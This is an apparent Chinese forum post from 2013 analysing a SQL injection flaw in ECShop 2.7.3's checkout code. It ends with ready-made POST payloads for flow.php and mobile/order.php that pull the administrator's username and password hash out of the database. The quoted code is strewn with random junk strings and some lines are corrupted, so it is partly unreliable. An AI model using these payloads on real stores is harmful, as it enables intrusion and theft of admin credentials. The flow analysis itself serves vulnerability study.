前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。
7 M1 _1 V4 X# O+ ~9 B1 ?: D
: K( x+ a3 ^, O6 N" h$ V+ j 漏洞关键文件:
& w: H0 A+ S& b l2 ]! T) @* D( a: ~# `9 h" K& G" M8 q2 }+ [
/includes/lib_order.php' j# q M$ G2 ^* M, k
5 \& Y3 r% Y8 q# v2 S# \ 关键函数:
: j( ]/ F B; a z) T: S& |6 ^
9 ~+ q/ u$ A3 L4 t+ E / M) S; e) H2 L' y
) a/ i# l2 E) v7 [0 v1 a. `) j3 o01 function available_shipping_list($region_id_list) ; e8 U7 a! h& [7 Y9 w) N
- Y" N% V2 D1 k: {; W' o
02 { ; h9 C: h! K) j
o' N) q$ M9 T5 e5 o2 k5 H
03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
% x: T, N9 ?7 `, K
6 h* ^& e6 {/ @5 e04 's.shipping_desc, s.insure, s.support_cod, a.configure ' . * X6 y% m: j) o1 Q- d
- G, `$ a$ a: a# ?
05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' . + Z: _, [, @. \3 v
2 d1 G6 X( {0 @3 C8 q+ Y3 U9 G06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
: x$ j/ j J2 T0 N! R; T+ l" S- F$ ~' r0 e" Q) C
07 $GLOBALS['ecs']->table('area_region') . ' AS r '. 9 v7 Q/ F- E6 w/ N
g$ r: C. z+ m( I _& T2 m! S08 'WHERE r.region_id ' . db_create_in($region_id_list) . * S) X% a+ c% c, @2 Y
+ d+ m, H3 k4 g- j6 E B09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order'; % y7 C4 p! z* C+ n- i y3 a2 W3 v
- W. u! A. j- \; Z8 l3 F4 C6 v3 a
10 # C; M3 R$ d; ]: n
. Q* f1 e1 d1 L
11 return $GLOBALS['db']->getAll($sql); ' v6 R/ c0 ]& X% K" \! u9 h! S
3 b1 w( q# M' e5 g2 f12 }
$ E' r3 l; }' b
# Q. j1 W( }$ s1 b显然对传入的参数没有任何过滤就带入了查询语句。
0 c4 }0 E- Y& f( V. J% ^" N
& Q v5 N2 M2 y( l0 w7 P下面我们追踪这个函数在flow.php中:. Q; J/ }% |0 |$ M$ d/ o
第531行: 6 Y r* |/ l: p M8 l
) ~4 d; s$ `; D# m! P
1 $shipping_list = available_shipping_list($region); 8 H4 I" H9 w* h0 W9 [8 n
, O, j% g, }* D- b5 W/ L4 B9 T2 ] ( d" ?2 O, m$ R2 e1 x' D1 C
6 o: c$ {0 Y1 M3 r# a' S2 s
5 ~* `' W. \+ J3 j% D @8 W; J! r% @8 Q) @; o
再对传入变量进行追踪:# n" b" p1 y N. w
8 o" U0 r2 u R9 B3 o, w' j
第530行:
8 s3 U! q9 Q. J& u2 I6 a" r! L+ n" ?* o9 M `4 r- y. c
1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']); - j3 G1 Y. d4 T
9 A- G) Y! S# t. Y) A
8 u: A2 a9 P" s/ H$ V; b: p9 m2 d
1 m1 t/ ~ X4 l' H5 Y2 W7 R- N
Y1 {3 L1 b& M) S7 G/ n. Y
# D4 C/ I0 A& g0 l+ U: V( o5 i第473行: 7 A) n& X5 s5 o
4 _+ u) H* T2 }1 q. [
1 $consignee = get_consignee($_SESSION['user_id']); 8 B# g* F& v% Y$ J2 _' u' E P$ u
- w+ L& b) H6 Z' } n
到了一个关键函数:& {0 W' t+ f1 J; t
4 L: |% l7 J" u: [4 S C1 x) }/includes/lib_order.php% z# y7 O9 G' V/ v2 K
# P/ C0 g) ]* d
- F+ Q& R* z' q- W5 }& S+ I: L! h3 U# R
z1 O# }) O. ^' v
- V! f3 p8 _; p* S) J0 V5 Z3 @
01 function get_consignee($user_id) 2 j0 ~4 n0 W& t0 B# q. r# M
; }1 K0 H9 D, a- J( c, K02 {
, |7 a* [" c! [2 t5 p/ j- W9 f- H O1 m
03 if (isset($_SESSION['flow_consignee']))
/ U/ r. U O4 |7 x+ V- y! g- `
# b7 X2 f; X' J' x8 }* r% E04 { 4 B( w1 ]' c( ~7 K
& t5 B. h! E, @$ r: J- x w
05 /* 如果存在session,则直接返回session中的收货人信息 */
. y( I C' @' t, e
- w( a6 N' g5 x6 u3 I- [06
W+ _% v$ p) C/ N; j- ]0 l2 e
, X% P3 w) S3 ~07 return $_SESSION['flow_consignee'];
, _/ G, |* ^; l7 l# U! ?. s
8 a) h. U8 \- H2 j5 B; f08 }
6 f7 ]4 q3 }1 v. k7 d
3 _( V* E) |6 x09 else
! O/ i+ L7 b& [9 V0 C
4 \9 q$ y7 b) N3 R2 C10 {
& v# H W- p. R" z# H0 J) P* m6 O( K# C
11 /* 如果不存在,则取得用户的默认收货人信息 */
& r& r/ g- o0 y9 t. k- T% M2 Q y: s! p G4 ^8 ^$ X
12 $arr = array(); $ S' i8 {" b+ R! N9 S- ~* L
" T' D1 n7 W' h$ }
13 6 E0 ^$ A l* t/ j4 t
% B; q0 ]7 C3 A9 N1 c( D
14 if ($user_id > 0) ! f, w: d5 R- `+ R G" E1 B
3 o0 \0 U8 N( {/ x5 P15 { 9 e* a2 p( K' D0 f, y- Z% m
4 H) t# B- l" g) E
16 /* 取默认地址 */
; |& B9 H. ]2 p& m4 |4 [/ N! M( D! b( P- ~
17 $sql = "SELECT ua.*".
4 V! H7 R+ t( h, ^
& h7 L% E; E- V8 Z18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
/ ^/ g* s% W. r% L; }* h: ]3 r7 g& e3 A$ b g
19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
- s; W) e1 @3 ]( k8 h* ~3 U. G! W1 l9 M- C9 C
20 7 ~8 a0 |) S- J' D6 u: C
3 ^% e$ U& U$ g0 Z
21 $arr = $GLOBALS['db']->getRow($sql); + m. }- E5 o8 m; x. @& @
8 i4 b# g; |" }& }1 t* y22 } . A& _( G* \% @8 \- ?& i
" s; f4 H b' F1 \% _
23
- [1 I! j N6 r+ X: v; p. w+ \6 m) A1 K/ n% g' a
24 return $arr; # R" t* c* W8 v
* v, l( m% q+ V+ C1 ~3 R
25 } # q9 l9 X! a, }& N6 R/ N5 D
0 E# d% M. Y3 q2 H
26 } / w0 o6 y2 ^+ Q; h3 {" r7 Y8 w
+ R$ K" b4 ~6 e3 y" @7 G k: p显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?! m7 y! \% u8 U# a7 b( Q
1 T# a5 U% s, w: X% R( o
6 [7 y$ l/ G/ z$ `# j
7 Z( Z' a0 X0 S( K) K3 ^, V. w关键点:
9 s: n& S. O! s& @! q
$ F& n9 s/ }, i8 N第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);0 e7 v7 |- f6 |$ S3 [6 O- L
0 y/ j, T- ~* s这里对传入参数反转义存入$_SESSION中。$ B" k7 u* [6 u8 ^- [
- o, H- U3 w$ S
0 f6 {' P5 {* ~6 n8 p
: `+ c- H n% `0 ~# U9 E) ~然后看下:
d7 t2 r& C" a* o7 X& V" o& ~- r/ Y+ ?! \7 s: o
8 y- | T2 q4 c' L5 ^3 W' k
7 y8 U0 n/ |# |1 x5 x3 @
X" w2 @2 n* U' ?, ^1 a1 Q7 F0 b; M$ I4 M# x! Z+ W2 V# }" M
01 $consignee = array(
2 K' i' M( E8 _0 x4 [6 V2 b3 N: t: M7 x2 R" i% l
02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']),
0 [ Y0 z4 }- x# A n P. A- W0 x5 m+ v, e; {0 w
03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']),
$ p9 v6 B) |$ ^4 K0 e
$ x( f% G4 v+ I04 'country' => empty($_POST['country']) ? ''  _POST['country'], 9 Z7 r8 o; X" ?2 ^
) w- P/ G0 u/ l: N& c7 o5 e7 ?05 'province' => empty($_POST['province']) ? '' _POST['province'],
2 F1 C# } \3 | n
4 m0 Q8 `- F) s: P1 K06 'city' => empty($_POST['city']) ? '' _POST['city'], + e) \& }) c+ I0 b* w& p
% `! W# R2 @! ]# q. H4 B+ K
07 'district' => empty($_POST['district']) ? '' _POST['district'], " X& D8 }9 f, b- V
+ ?8 Y; c+ o6 k( O- w
08 'email' => empty($_POST['email']) ? '' _POST['email'],
7 g$ [, V- B w5 ~. f1 z) W: N! U+ x Z
09 'address' => empty($_POST['address']) ? '' _POST['address'],
^2 v9 u9 a% t# `8 {
; e3 h8 Q. u6 C+ _/ \10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
' c% V/ M2 U! j. o, M1 s; k, `7 O, P6 \ n! e
11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])), . H3 P" i3 N2 y. m. {
$ b, F# q9 ?' j5 H3 n( _# ` W8 i2 ^
12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])),
, [8 _, V3 ]% H$ {6 H2 C
( ~" ?9 k! Z, Q7 m- M* e13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
6 ^' R/ X; ]' s0 h* m, A+ s$ _: d- z; }" T6 U, p/ l8 v) N8 w
14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'],
; x% E# W3 ?% s: ^/ s# H$ Q5 R/ y1 ]# T0 m$ A/ M
15 ); ! `, D3 f$ U C; N
' A* @0 }9 E7 B7 J8 i6 A' q5 I4 s好了注入就这样出现了。5 {$ H0 }+ K7 ]& H% {0 g
9 `3 F4 R, t- `* k==================
* g% E1 B7 Y: z6 `3 I2 A0 q
9 a% I7 D, j$ Y9 V1 U. D注入测试:
( |9 {. Q+ ^! S k5 ?+ n% U: ^; _6 H
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
0 K* Y1 \& {. u& k/ W' {6 ^; J7 z: H- K$ n
测试程序:ECShop_V2.7.3_UTF8_release11069 I8 F& F- v' @# P
% [" P, |* D. _ F" L5 a
. m; T9 k3 @0 g) T# ~$ h& @
5 P( t! ?$ t+ ~5 z# Z1.首先需要点击一个商品加入购物车
" I) f( W" D7 J
: d1 b4 W% W6 F# p& j; q1 n M# {2.注册一个会员帐号
7 ?& a" J3 X. M0 [9 X- P2 I
' N7 \: i* V1 J6 w8 S& U9 B3.post提交数据
4 i; D; F; ~1 _
3 T) @- Y2 F `4 G; ^0 {
- u- p3 }" l7 V3 Z% q) H8 e7 ~: u* _' U# U, P3 n! Q
1 http://127.0.0.1/ecshop/flow.php
" Z$ N) h5 L* [
5 ]7 K! `- F: r: n1 ?4 e2 : I- w9 v+ y5 b5 p
' `: c/ n+ F6 r( C3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id= 1 r+ q2 f! i4 s2 V
举一反三,我们根据这个漏洞我们可以继续深入挖掘:
2 K8 |$ r* }' M
8 A3 e8 U3 T" Y/ y, E1 I我们搜寻关键函数function available_shipping_list(), }* T& f. r+ J b/ P/ {7 v
+ w0 {# n; ~) i! _% k* M- [+ u& W在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同
3 H& q+ f8 |" Z' f
% @7 [) u4 Q: ]6 H$ k* z, d$ a% d利用exp:
/ d9 A6 | A' `3 c. W8 d, [" ]( D
$ ~6 [/ ^8 ?6 ?% g* `1.点击一个商品,点击购买商标. x- }3 w0 z T: M L p
# R$ \- ~" `# t- p2.登录会员帐号4 \1 T6 F F" h- ~+ x
. v4 s' x6 E1 o! D3.post提交:
9 p; ~, I- N) h
7 r8 m ]. {" w- `http://127.0.0.1/ecshop/mobile/order.php7 i4 {/ q/ w+ ], T# u
" r0 l0 {9 s5 ~! g2 O% g/ M 4 ]1 E$ D0 a3 ?& h) w# I& ^! Q4 t
. Y3 U/ z9 w( s, z& T7 @* V
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=' {2 E1 L/ k% o8 j7 i& M" i& d
5 ~, ^; F8 R) F0 h5 Y
|
发表于 2013-1-13 09:48:03
收藏
支持
反对